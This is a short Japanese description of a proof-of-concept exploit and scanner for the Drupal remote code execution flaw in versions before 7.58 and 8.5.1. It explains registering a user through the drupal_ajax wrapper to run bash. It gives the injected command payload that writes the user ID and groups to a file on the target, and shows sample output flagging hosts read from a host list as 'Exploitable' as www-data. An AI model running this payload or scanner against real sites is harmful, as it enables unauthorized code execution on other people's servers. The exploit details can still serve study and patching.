Drupal 7.58未満、8.x 8.3.9未満、8.4.x 8.4.6未満、8.5.x 8.5.1未満のバージョンでは、デフォルトまたは一般的なモジュール構成の複数のサブシステムに影響する問題により、リモート攻撃者が任意のコードを実行できる可能性があります。
drupal_ajax ラッパーにパケットを送信してユーザーを登録します。ユーザーが exec マークアップを使用してbashを実行できるようにします。このPoCは、ユーザー名とIDを abcde.txt に送信します。
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
http*://example.com/abcde.txt を確認します
[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text
%s = ファイル名
ユーザーID、PID、グループペイロード
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s